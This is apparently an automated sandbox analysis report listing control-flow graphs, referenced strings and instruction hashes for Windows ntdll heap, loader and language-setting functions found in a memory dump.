                                        control_flow_graph 95 329b9060-329b90a9 96 329b90ab-329b90b0 95->96 97 329b90f8-329b9107 95->97 99 329b90b4-329b90ba 96->99 98 329b9109-329b910e 97->98 97->99 100 329b9893-329b98a7 call 32954b50 98->100 101 329b90c0-329b90e4 call 32958f40 99->101 102 329b9215-329b923d call 32958f40 99->102 111 329b9113-329b91b4 GetPEB call 329bd7e5 101->111 112 329b90e6-329b90f3 call 329d92ab 101->112 109 329b923f-329b925a call 329b98aa 102->109 110 329b925c-329b9292 102->110 115 329b9294-329b9296 109->115 110->115 122 329b91d2-329b91e7 111->122 123 329b91b6-329b91c4 111->123 121 329b91fd-329b9210 RtlDebugPrintTimes 112->121 115->100 119 329b929c-329b92b1 RtlDebugPrintTimes 115->119 119->100 129 329b92b7-329b92be 119->129 121->100 122->121 125 329b91e9-329b91ee 122->125 123->122 124 329b91c6-329b91cb 123->124 124->122 127 329b91f3-329b91f6 125->127 128 329b91f0 125->128 127->121 128->127 129->100 131 329b92c4-329b92df 129->131 132 329b92e3-329b92f4 call 329ba388 131->132 135 329b92fa-329b92fc 132->135 136 329b9891 132->136 135->100 137 329b9302-329b9309 135->137 136->100 138 329b930f-329b9314 137->138 139 329b947c-329b9482 137->139 140 329b933c 138->140 141 329b9316-329b931c 138->141 142 329b9488-329b94b7 call 32958f40 139->142 143 329b961c-329b9622 139->143 145 329b9340-329b9391 call 32958f40 RtlDebugPrintTimes 140->145 141->140 144 329b931e-329b9332 141->144 160 329b94b9-329b94c4 142->160 161 329b94f0-329b9505 142->161 147 329b9674-329b9679 143->147 148 329b9624-329b962d 143->148 151 329b9338-329b933a 144->151 152 329b9334-329b9336 144->152 145->100 187 329b9397-329b939b 145->187 149 329b9728-329b9731 147->149 150 329b967f-329b9687 147->150 148->132 155 329b9633-329b966f call 32958f40 148->155 149->132 159 329b9737-329b973a 149->159 156 329b9689-329b968d 150->156 157 329b9693-329b96bd call 329b8093 150->157 151->145 152->145 172 329b9869 155->172 156->149 156->157 184 329b9888-329b988c 157->184 185 329b96c3-329b971e call 32958f40 RtlDebugPrintTimes 157->185 166 329b97fd-329b9834 call 32958f40 159->166 167 329b9740-329b978a 159->167 168 329b94cf-329b94ee 160->168 169 329b94c6-329b94cd 160->169 163 329b9511-329b9518 161->163 164 329b9507-329b9509 161->164 175 329b953d-329b953f 163->175 173 329b950b-329b950d 164->173 174 329b950f 164->174 197 329b983b-329b9842 166->197 198 329b9836 166->198 179 329b978c 167->179 180 329b9791-329b979e 167->180 171 329b9559-329b9576 RtlDebugPrintTimes 168->171 169->168 171->100 201 329b957c-329b959f call 32958f40 171->201 181 329b986d 172->181 173->163 174->163 188 329b951a-329b9524 175->188 189 329b9541-329b9557 175->189 179->180 182 329b97aa-329b97ad 180->182 183 329b97a0-329b97a3 180->183 191 329b9871-329b9886 RtlDebugPrintTimes 181->191 192 329b97b9-329b97fb 182->192 193 329b97af-329b97b2 182->193 183->182 184->132 185->100 227 329b9724 185->227 199 329b93eb-329b9400 187->199 200 329b939d-329b93a5 187->200 194 329b952d 188->194 195 329b9526 188->195 189->171 191->100 191->184 192->191 193->192 205 329b952f-329b9531 194->205 195->189 203 329b9528-329b952b 195->203 206 329b984d 197->206 207 329b9844-329b984b 197->207 198->197 202 329b9406-329b9414 199->202 208 329b93d2-329b93e9 200->208 209 329b93a7-329b93d0 call 329b8093 200->209 224 329b95bd-329b95d8 201->224 225 329b95a1-329b95bb 201->225 211 329b9418-329b946f call 32958f40 RtlDebugPrintTimes 202->211 203->205 213 329b953b 205->213 214 329b9533-329b9535 205->214 215 329b9851-329b9857 206->215 207->215 208->202 209->211 211->100 231 329b9475-329b9477 211->231 213->175 214->213 220 329b9537-329b9539 214->220 221 329b9859-329b985c 215->221 222 329b985e-329b9864 215->222 220->175 221->172 222->181 228 329b9866 222->228 229 329b95dd-329b960b RtlDebugPrintTimes 224->229 225->229 227->149 228->172 229->100 233 329b9611-329b9617 229->233 231->184 233->159
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $ $0
                                        • API String ID: 3446177414-3352262554
                                        • Opcode ID: 8f2101f50bae0a24146bf931d7a88078ed5295c17da7f93dd4143287dd31d79e
                                        • Instruction ID: dd2b2453c8062a93692513380dfe1ba28445ab8920d5fca77bed70a0aedb08f1
                                        • Opcode Fuzzy Hash: 8f2101f50bae0a24146bf931d7a88078ed5295c17da7f93dd4143287dd31d79e
                                        • Instruction Fuzzy Hash: 7C3216B16183818FE750CF68C484B5BBBE9BF88348F00492EF99987251DBB5D949CF52
                                        Function 329BF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 611 329bf0a5-329bf0c7 call 32967be4 614 329bf0c9-329bf0de RtlDebugPrintTimes 611->614 615 329bf0e3-329bf0fb call 32907662 611->615 619 329bf3e7-329bf3f6 614->619 620 329bf3d2 615->620 621 329bf101-329bf11c 615->621 624 329bf3d5-329bf3e4 call 329bf3f9 620->624 622 329bf11e 621->622 623 329bf125-329bf137 621->623 622->623 625 329bf139-329bf13b 623->625 626 329bf13c-329bf144 623->626 624->619 625->626 629 329bf14a-329bf14d 626->629 630 329bf350-329bf359 GetPEB 626->630 629->630 633 329bf153-329bf156 629->633 631 329bf35b-329bf376 GetPEB call 3290b910 630->631 632 329bf378-329bf37d call 3290b910 630->632 639 329bf382-329bf396 call 3290b910 631->639 632->639 636 329bf158-329bf170 call 3291fed0 633->636 637 329bf173-329bf196 call 329c0835 call 32925d90 call 329c0d24 633->637 636->637 637->624 650 329bf19c-329bf1a3 637->650 639->620 651 329bf1ae-329bf1b6 650->651 652 329bf1a5-329bf1ac 650->652 653 329bf1b8-329bf1c8 651->653 654 329bf1d4-329bf1d8 651->654 652->651 653->654 655 329bf1ca-329bf1cf call 329cd646 653->655 656 329bf1da-329bf1ed call 32943ae9 654->656 657 329bf208-329bf20e 654->657 655->654 666 329bf1ff 656->666 667 329bf1ef-329bf1fd call 3293fdb9 656->667 658 329bf211-329bf21b 657->658 661 329bf22f-329bf236 658->661 662 329bf21d-329bf22d 658->662 664 329bf238-329bf23c call 329c0835 661->664 665 329bf241-329bf250 GetPEB 661->665 662->661 664->665 670 329bf2be-329bf2c9 665->670 671 329bf252-329bf255 665->671 668 329bf202-329bf206 666->668 667->668 668->658 670->624 674 329bf2cf-329bf2d5 670->674 675 329bf257-329bf272 GetPEB call 3290b910 671->675 676 329bf274-329bf279 call 3290b910 671->676 674->624 677 329bf2db-329bf2e2 674->677 680 329bf27e-329bf292 call 3290b910 675->680 676->680 677->624 681 329bf2e8-329bf2f3 677->681 688 329bf295-329bf29f GetPEB 680->688 681->624 684 329bf2f9-329bf302 GetPEB 681->684 686 329bf321-329bf326 call 3290b910 684->686 687 329bf304-329bf31f GetPEB call 3290b910 684->687 693 329bf32b-329bf34b call 329b823a call 3290b910 686->693 687->693 688->624 691 329bf2a5-329bf2b9 688->691 691->624 693->688
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                        • API String ID: 3446177414-1745908468
                                        • Opcode ID: b5f38d8c031e708ae6bfc57cca2ba29b9638b0acd58e10ac669c9e64b9ad90a0
                                        • Instruction ID: e46966d8ec018c42972ee5ef15af2027bc60209186edc60790ba5cf96264ecbb
                                        • Opcode Fuzzy Hash: b5f38d8c031e708ae6bfc57cca2ba29b9638b0acd58e10ac669c9e64b9ad90a0
                                        • Instruction Fuzzy Hash: 4C91FE39901749DFDF02CFA8C440AADBBF6FF49358F048459E445AB652CB799982CB50
                                        Function 3290640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 698 3290640d-3290646c call 32906c11 701 32906472-3290649e call 3292e8a6 call 32906b45 698->701 702 32969770-32969779 698->702 719 329064a4-329064a6 701->719 720 329697e9-329697f2 call 3293e7e0 701->720 704 329697b3-329697b6 702->704 705 3296977b-3296978d 702->705 706 329697dd 704->706 708 329697a0-329697b0 call 3298e692 705->708 709 32906542-3290654a 706->709 710 329697e3-329697e4 706->710 708->704 713 32906550-32906564 call 32954b50 709->713 714 32969827-3296982b call 3290ba80 709->714 710->709 721 32969830 714->721 724 329697f7-329697fe 719->724 725 329064ac-329064d8 call 32947df6 call 3292d3e1 call 32906868 719->725 720->724 721->721 728 32969800 call 3298e692 724->728 729 329697db 724->729 738 32969802-3296980b 725->738 739 329064de-32906526 RtlDebugPrintTimes 725->739 728->729 729->706 738->704 740 3296980d 738->740 739->709 743 32906528-3290653c call 32906565 739->743 740->708 743->709 746 3296980f-32969822 GetPEB call 32923bc0 743->746 746->709
                                        APIs
                                        • RtlDebugPrintTimes.NTDLL ref: 3290651C
                                          • Part of subcall function 32906565: RtlDebugPrintTimes.NTDLL ref: 32906614
                                          • Part of subcall function 32906565: RtlDebugPrintTimes.NTDLL ref: 3290665F
                                        Strings
                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3296977C
                                        • LdrpInitShimEngine, xrefs: 32969783, 32969796, 329697BF
                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 329697B9
                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32969790
                                        • apphelp.dll, xrefs: 32906446
                                        • minkernel\ntdll\ldrinit.c, xrefs: 329697A0, 329697C9
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        • API String ID: 3446177414-204845295
                                        • Opcode ID: 17fe8a395b718c914817f455a02ceaedada304d3edba18a61436e7ad7acb455c
                                        • Instruction ID: 03867a5993c63f9c8c218209f5c287719abc3df8a23099088374f3780d5fd2c1
                                        • Opcode Fuzzy Hash: 17fe8a395b718c914817f455a02ceaedada304d3edba18a61436e7ad7acb455c
                                        • Instruction Fuzzy Hash: F951B0752493049FF324CF24D890AABB7E8FF84758F40891DF68597265DB30D946CB92
                                        Function 3290D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 780 3290d2ec-3290d32d 781 3290d333-3290d335 780->781 782 3296a69c 780->782 781->782 783 3290d33b-3290d33e 781->783 785 3296a6a6-3296a6bf call 329cbd08 782->785 783->782 784 3290d344-3290d34c 783->784 786 3290d356-3290d3a1 call 32955050 call 32952ab0 784->786 787 3290d34e-3290d350 784->787 792 3296a6c5-3296a6c8 785->792 793 3290d56a-3290d56d 785->793 804 3296a600-3296a61a call 32907220 786->804 805 3290d3a7-3290d3b0 786->805 787->786 790 3296a5f6-3296a5fb 787->790 795 3290d5c0-3290d5c8 790->795 796 3290d54d-3290d54f 792->796 798 3290d56f-3290d575 793->798 796->793 802 3290d551-3290d564 call 32933262 796->802 799 3290d63b-3290d63d 798->799 800 3290d57b-3290d588 GetPEB call 32923bc0 798->800 806 3290d58d-3290d592 799->806 800->806 802->793 820 3296a6cd-3296a6d2 802->820 824 3296a624-3296a628 804->824 825 3296a61c-3296a61e 804->825 810 3290d3b2-3290d3b4 805->810 811 3290d3ba-3290d3cd call 3290d736 805->811 808 3290d5a1-3290d5a6 806->808 809 3290d594-3290d59d call 32952a80 806->809 816 3290d5b5-3290d5ba 808->816 817 3290d5a8-3290d5b1 call 32952a80 808->817 809->808 810->811 815 3296a630-3296a63b call 329cad61 810->815 830 3290d3d3-3290d3d7 811->830 831 3296a658 811->831 815->811 834 3296a641-3296a653 815->834 816->795 826 3296a6d7-3296a6db call 32952a80 816->826 817->816 820->793 824->815 825->824 832 3290d52e 825->832 835 3296a6e0 826->835 837 3290d5cb-3290d623 call 32955050 call 32952ab0 830->837 838 3290d3dd-3290d3f7 call 3290d8d0 830->838 839 3296a660-3296a662 831->839 836 3290d530-3290d535 832->836 834->811 835->835 840 3290d537-3290d539 836->840 841 3290d549 836->841 853 3290d642-3290d645 837->853 854 3290d625 837->854 838->839 848 3290d3fd-3290d44e call 32955050 call 32952ab0 838->848 839->793 844 3296a668 839->844 840->785 845 3290d53f-3290d543 840->845 841->796 851 3296a66d 844->851 845->785 845->841 848->831 860 3290d454-3290d45d 848->860 857 3296a677-3296a67c 851->857 853->832 859 3290d62f-3290d636 854->859 857->799 859->836 860->851 861 3290d463-3290d492 call 32955050 call 3290d64a 860->861 861->859 866 3290d498-3290d49e 861->866 866->859 867 3290d4a4-3290d4aa 866->867 867->799 868 3290d4b0-3290d4cc GetPEB call 32925d90 867->868 868->857 871 3290d4d2-3290d4ef call 3290d64a 868->871 874 3290d4f1-3290d4f6 871->874 875 3290d526-3290d52c 871->875 876 3296a681-3296a686 874->876 877 3290d4fc-3290d524 call 32934ca6 874->877 875->798 875->832 876->877 879 3296a68c-3296a697 876->879 877->875 879->836
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                        • API String ID: 0-3532704233
                                        • Opcode ID: 338aafaf5611a11649519608ca94a6b7db44198a2ecaa7567f1fccd507ba8330
                                        • Instruction ID: a3870da761c58b601f36370b81c43d5f78aebce44e8fa8383d4961667025b019
                                        • Opcode Fuzzy Hash: 338aafaf5611a11649519608ca94a6b7db44198a2ecaa7567f1fccd507ba8330
                                        • Instruction Fuzzy Hash: 34B16AB69083499FD715CE24C840B5FB7E8EF88758F41892EF98997241DB70D948CFA2
                                        Function 3293D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlDebugPrintTimes.NTDLL ref: 3293D879
                                          • Part of subcall function 32914779: RtlDebugPrintTimes.NTDLL ref: 32914817
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                        • API String ID: 3446177414-1975516107
                                        • Opcode ID: e7eb1615060f4ab6edfe91d4cc19903373e691ecd2e51372ad6bad080fddd7c9
                                        • Instruction ID: 417d12a6366e0463dd71d822ab61878c489a7d55861df21c8823e1242d0f16d2
                                        • Opcode Fuzzy Hash: e7eb1615060f4ab6edfe91d4cc19903373e691ecd2e51372ad6bad080fddd7c9
                                        • Instruction Fuzzy Hash: 4C5115B5A463459FEB15CFA8C45478DBBF1BF44718F108059DA01BB285DB70E987CBA0
                                        Function 3290D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                        Download Yara Rule
                                        Strings
                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3290D06F
                                        • @, xrefs: 3290D09D
                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3290D0E6
                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 3290D136
                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3290D263
                                        • @, xrefs: 3290D2B3
                                        • @, xrefs: 3290D24F
                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3290D202
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                        • API String ID: 0-1356375266
                                        • Opcode ID: 29a002e69c285f8e24dfb3edb2a1192045b383b9b328f2a1c4541ddb012f0d20
                                        • Instruction ID: 83573b6c60e5f52c4d16a73e4cd8063b741644b5da1c534d62bdd3fc1d0bf52a
                                        • Opcode Fuzzy Hash: 29a002e69c285f8e24dfb3edb2a1192045b383b9b328f2a1c4541ddb012f0d20
                                        • Instruction Fuzzy Hash: B8A101B59083499FE321CF14C840B9FB7E8EF88759F50492EF99896241DB74D948CFA2
                                        Function 329BF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                        • API String ID: 0-2224505338
                                        • Opcode ID: 9c87cdf2384340821eb1ed41915d4ea9a65b0d9f936da89ea2a769f1dff51003
                                        • Instruction ID: bbccb24c26bf8d2853b00a1dc9d8454cfdf9c363a7da886dd47015bb7c5b5e9f
                                        • Opcode Fuzzy Hash: 9c87cdf2384340821eb1ed41915d4ea9a65b0d9f936da89ea2a769f1dff51003
                                        • Instruction Fuzzy Hash: 5551263A90224CEFEB11CFE4C894F5AB3A8EF05768F108899F9119B652CA75D980CF10
                                        Function 3293237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                        Download Yara Rule
                                        Strings
                                        • LdrpDynamicShimModule, xrefs: 3297A7A5
                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3297A79F
                                        • apphelp.dll, xrefs: 32932382
                                        • minkernel\ntdll\ldrinit.c, xrefs: 3297A7AF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        • API String ID: 0-176724104
                                        • Opcode ID: cd97b16a757fc39583a4fc7493ceaf9b459cee2d7e6aca20dac082952770c77f
                                        • Instruction ID: 1eea82e8ba738772c9dfdfd00063a148636b9fecf92e7891db12f937678d9d36
                                        • Opcode Fuzzy Hash: cd97b16a757fc39583a4fc7493ceaf9b459cee2d7e6aca20dac082952770c77f
                                        • Instruction Fuzzy Hash: 9A31E376E41300EFF7159F5DC880B9A77B9FF84B54F148459E9006B249DBB2A983CB90
                                        Function 3290F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-523794902
                                        • Opcode ID: 00c26f65706f4fb5f94dac276206dd6038b64359a66fcb3b0054aa5c487fc484
                                        • Instruction ID: f8803fbd9a1285f2d90f24b8bd68df0bf871b1e999a4651bd6a41dbb28b3b28c
                                        • Opcode Fuzzy Hash: 00c26f65706f4fb5f94dac276206dd6038b64359a66fcb3b0054aa5c487fc484
                                        • Instruction Fuzzy Hash: 73421F752083859FD315CF28C484B2AB7E9FF88758F048969E8958B342DF74DA85CF62
                                        Function 3292B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                        • API String ID: 0-122214566
                                        • Opcode ID: 401eee34100df56bc9a496123c9d83357631c871ef933bfe64e73a9d39a772cf
                                        • Instruction ID: 04f3312fc0674bc8072e1a3da5cf7428fc66dfda53fdbfb850f159c9c09f3106
                                        • Opcode Fuzzy Hash: 401eee34100df56bc9a496123c9d83357631c871ef933bfe64e73a9d39a772cf
                                        • Instruction Fuzzy Hash: 8DC14875A0031D9FEB158B68C8A0BBE77E8BF55744F5480A9ED01AB299EFB4DC44C390
                                        Function 32942594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                        Download Yara Rule
                                        Strings
                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 32981F8A
                                        • RtlGetAssemblyStorageRoot, xrefs: 32981F6A, 32981FA4, 32981FC4
                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 32981F82
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 32981FC9
                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 32981FA9
                                        • SXS: %s() passed the empty activation context, xrefs: 32981F6F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                        • API String ID: 0-861424205
                                        • Opcode ID: fbff590b1ad6d2c96daf605f3b51f6192c99ad990aa8fa33e8489b4a56c8f9d0
                                        • Instruction ID: e252d258dc054ebd308854b9c0df4ca30ec77e09d56fbeef78b25fb510853f2e
                                        • Opcode Fuzzy Hash: fbff590b1ad6d2c96daf605f3b51f6192c99ad990aa8fa33e8489b4a56c8f9d0
                                        • Instruction Fuzzy Hash: 6431C57AE00224BBF7208A85EC44F5B7B6CEF45B94F0541AAF9006B241DB70AE40CAE5
                                        Function 32920680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 0-4253913091
                                        • Opcode ID: 963ade29c8a933cb96ccd1b402cfafbe1e0ede07a61676cf43ca0bfe0197b3b0
                                        • Instruction ID: 193db7c0d480851d406181278afdb5bf4e6147e3ada33be5b69bde7bf27d168a
                                        • Opcode Fuzzy Hash: 963ade29c8a933cb96ccd1b402cfafbe1e0ede07a61676cf43ca0bfe0197b3b0
                                        • Instruction Fuzzy Hash: 44F1CD74A00709DFEB18CF68C884B6AB7B9FF44344F1181A9E8159B386DB74E981CF90
                                        Function 32939723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
